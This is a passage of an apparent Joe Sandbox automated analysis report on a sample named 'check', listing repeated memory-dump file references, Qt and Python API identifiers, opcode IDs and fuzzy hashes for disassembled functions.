                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?staticInstances@List@Loader@@Object@@@@Pluginmalloc
                                                                                                                                                                                                                • String ID: QPluginLoader$staticInstances$staticInstances() -> List[QObject]
                                                                                                                                                                                                                • API String ID: 1336085070-2426234766
                                                                                                                                                                                                                • Opcode ID: 43b0fce87df724426235fc8344107909b686ab5b4806cc5e1184773cff1de558
                                                                                                                                                                                                                • Instruction ID: 63eb7dbc90fbc0f8db14b80f21f8f450b30b892c1be534ef28c69fc5d73399fc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43b0fce87df724426235fc8344107909b686ab5b4806cc5e1184773cff1de558
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15011DA5A0AA4781EE409B36E84CBA923B0FB89B85F985032C54E63765EE7CD149C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE ref: 00007FFB02FEE467
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Date$?currentTimeTime@@Utc@malloc
                                                                                                                                                                                                                • String ID: QDateTime$currentDateTimeUtc$currentDateTimeUtc() -> QDateTime
                                                                                                                                                                                                                • API String ID: 876790064-3544645840
                                                                                                                                                                                                                • Opcode ID: 89ddf49eaa7b50e23424dcc89d73e66425bb74a40e6c806eab6bf4311385a91e
                                                                                                                                                                                                                • Instruction ID: b694227bf469362224d4a629b9783111978066158f6275c44a34b277338a47d4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89ddf49eaa7b50e23424dcc89d73e66425bb74a40e6c806eab6bf4311385a91e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D0181A5A0AA4781EF80EB35E848BA923A0FF8DB45F985432C50E23725DF7CD149C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?current@QDir@@SA?AV1@XZ.QT5CORE ref: 00007FFB02FC6327
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?current@Dir@@malloc
                                                                                                                                                                                                                • String ID: QDir$current$current() -> QDir
                                                                                                                                                                                                                • API String ID: 383571785-842594834
                                                                                                                                                                                                                • Opcode ID: 10977a0485cb52175c9f7d668d23d476df31c460bc61997fcd37f0d9040dda48
                                                                                                                                                                                                                • Instruction ID: 4f97c42cbedc2cbf034fea0d6a711d9a322020e54fb4950fc7ec018aa4b2c904
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10977a0485cb52175c9f7d668d23d476df31c460bc61997fcd37f0d9040dda48
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A301A4A5A0EA4782EF409B79E858BB923B0FF89B81F981032C54D53725EF3CD049C704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setAllowed@Application@@CoreSetuid
                                                                                                                                                                                                                • String ID: QCoreApplication$setSetuidAllowed$setSetuidAllowed(allow: bool)
                                                                                                                                                                                                                • API String ID: 1121762407-2589297722
                                                                                                                                                                                                                • Opcode ID: c2979a62a63fe23448e4a1cfad2989cbed0475d0e6b3a4b811ef736ca54e3a07
                                                                                                                                                                                                                • Instruction ID: 2c632fa42e0019e93ee19a69025e3d3f3b9f2d0b27b3a27f0f5f57c1a2c0dfb7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2979a62a63fe23448e4a1cfad2989cbed0475d0e6b3a4b811ef736ca54e3a07
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D013CE1A09A4BC5EA049F25EC88BA93770FB85B45F980032DA4D23735DFBDD14AC744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object@@Thread@@$?current?delete?thread@Eval_Later@SaveThreadThread@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2203365963-0
                                                                                                                                                                                                                • Opcode ID: 27ba671165b3b88c6fdda6c2b035f417e808a768c07535b8e5be804573b742a4
                                                                                                                                                                                                                • Instruction ID: e78b094a5ef4f24118008e9fe0c415faf4af2747fe2997df82e67d3af0cc89ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27ba671165b3b88c6fdda6c2b035f417e808a768c07535b8e5be804573b742a4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F01DA5A0AA5285EA149B22E60863D6761AF85FC1F184031DE4A13B68EFBCD4D58704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2227637845.00007FF60B121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF60B120000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227556529.00007FF60B120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227756739.00007FF60B14B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B15E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2227848738.00007FF60B161000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2228102414.00007FF60B164000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff60b120000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                • Instruction ID: 441de3a6353f50f74bb9601048fdef0722fc3daaff216b9c2ca333b035fad7c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC41A432B18B8181DB608F25E4443AA6760FB9CB98F648135EE4ED77A8EF3CD401C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J9
                                                                                                                                                                                                                • API String ID: 2610644205-2407233842
                                                                                                                                                                                                                • Opcode ID: c22ba42ef31727e112c072f924a147ee5685de5ad8b62b4dd0872ff81b83ef80
                                                                                                                                                                                                                • Instruction ID: f63de2bfac8735e88bec2f0b73d10004d3003920e4993cb65dcec7287e5336c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c22ba42ef31727e112c072f924a147ee5685de5ad8b62b4dd0872ff81b83ef80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A2191A6A09B8681EF019F79E4046B9A365FF89BE5F084135DE4D13B65EF7CE185C300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J1
                                                                                                                                                                                                                • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                • Opcode ID: 5b9fb900f548b039925571cf2c68cd589390c701982de7c71adb256aa5b6b607
                                                                                                                                                                                                                • Instruction ID: 15f822371ccbe9698f7c959a4796aad3193c98d40fce364a99547039804ed5ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9fb900f548b039925571cf2c68cd589390c701982de7c71adb256aa5b6b607
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 832130B6A09B4282EA518F26F44856D73A5FB88FD0F584032DE4D23B64EF3CD486CB44
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J1
                                                                                                                                                                                                                • API String ID: 2610644205-2174808320
                                                                                                                                                                                                                • Opcode ID: 031c5498cd2213402fe51dee39788d936112fe1991d7d7578c1b9b3898e5796d
                                                                                                                                                                                                                • Instruction ID: 81e1539a298ebae10e8ce7a0da55bff6998cedbb0152f29a617f73e7811343e4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 031c5498cd2213402fe51dee39788d936112fe1991d7d7578c1b9b3898e5796d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C216DB6A0AB4282EA518F26E45896973A4FB88FD0F1C4032DE4D13B64DF3CD496CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_FromLong
                                                                                                                                                                                                                • String ID: 1J1
